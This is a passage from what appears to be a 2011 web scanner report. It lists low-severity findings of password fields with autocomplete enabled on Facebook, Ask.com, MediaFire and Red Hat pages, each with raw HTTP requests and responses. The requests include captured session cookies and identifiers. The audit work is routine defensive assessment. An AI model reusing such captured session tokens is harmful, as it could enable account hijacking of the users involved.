who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<table>
<form method="post" action="https://secure.friendfinder.com/p/login.cgi" name="LOGIN" target="_top" >
<div>
...[SNIP]...
<td>
<input name="password" type="password" value="" class="frm-pwd"/>
</td>
...[SNIP]...

9.2. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /people/Andr%C3%A9-Azevedo/1668500662

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /people/Andr%C3%A9-Azevedo/1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
Content-Length: 998
Cache-Control: max-age=0
Origin: http://pt-br.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1

post_form_id=208956c150919ab1cdeb13e59d929c7b&lsd=yxUAz&captcha_persist_data=AZn2Prk2YE02IBt6SralDuwZdXf9ZmW3h45Cn_PY4olwLPKhUXsCTDVn8L9HD-Vh3HuEMIvMMVmehaCRNynGK33nkkHNi9pP41mupKoNjo04_5AY6G12AqHHbwP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.166.91
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:57 GMT
Content-Length: 72641

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" xmlns:og="http://ogp.me/ns#" lang="pt" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

9.3. http://www.ask.com/settings  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

9.4. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ConanTheBarbarian?sk=app_108503912579284 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; rdir=/login.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.43.49
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:20 GMT
Content-Length: 49693

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

9.5. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p; lsd=yxUAz; next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; next_path=%2Fhome.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=pG8pTrLcOF5vWXJLyEMRGq7p; expires=Wed, 14-Aug-2013 18:26:50 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.228.27
X-Cnection: close
Date: Mon, 15 Aug 2011 18:26:50 GMT
Content-Length: 17097

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="27lC";</script><noscript
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

9.6. http://www.facebook.com/media/set/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /media/set/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/set/?set=a.206519616063696.51681.146642365384755 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; wd=1123x954; x-src=%2Fmedia%2Fset%2F%7Cpagelet_photo_albums; act=1313433588181%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433588184%2C%22act%22%2C1313433588181%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%22click%22%2C%22click%22%2C%22photo_albums%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C328%2C584%2C63%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.237.31
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:52 GMT
Content-Length: 172809

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/media\/set\/index.php";window._EagleEyeSeed="QNCv";</scri
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

9.7. http://www.mediafire.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" id="use_fb_email_form" onsubmit="wP(2);return true;"> <label>Password:</label> <input type="password" name="use_fb_email_pass" id="use_fb_email_pass" class="login_box"> <label>
...[SNIP]...
</label> <input type="password" name="use_fb_email_pass2" id="use_fb_email_pass2" class="login_box"> <div>
...[SNIP]...

9.8. http://www.mediafire.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/tw_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="mf2_password" id="mf2_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link" target="_top">
...[SNIP]...

9.9. http://www.mediafire.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <p class="soc_display_email" id="fb_step3_email">
...[SNIP]...
</label> <input type="password" name="mf_password" id="mf_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link">
...[SNIP]...

9.10. http://www.mediafire.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" id="link_mf_acct_form" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="mf2_password" id="mf2_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link" target="_top">
...[SNIP]...

9.11. http://www.mediafire.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/tw_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="use_tw_email_pass" id="use_tw_email_pass" class="login_box"> <label>
...[SNIP]...
</label> <input type="password" name="use_tw_email_pass2" id="use_tw_email_pass2" class="login_box"> <div>
...[SNIP]...

9.12. https://www.redhat.com/wapps/sso/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.redhat.com
Path:   /wapps/sso/login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435291617; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%252523nolink%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7488
Expires: Mon, 15 Aug 2011 19:09:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:09:09 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=IEriNWxEeecvJQPFhSsTOw**.4b748952; Path=/wapps/sso; Secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


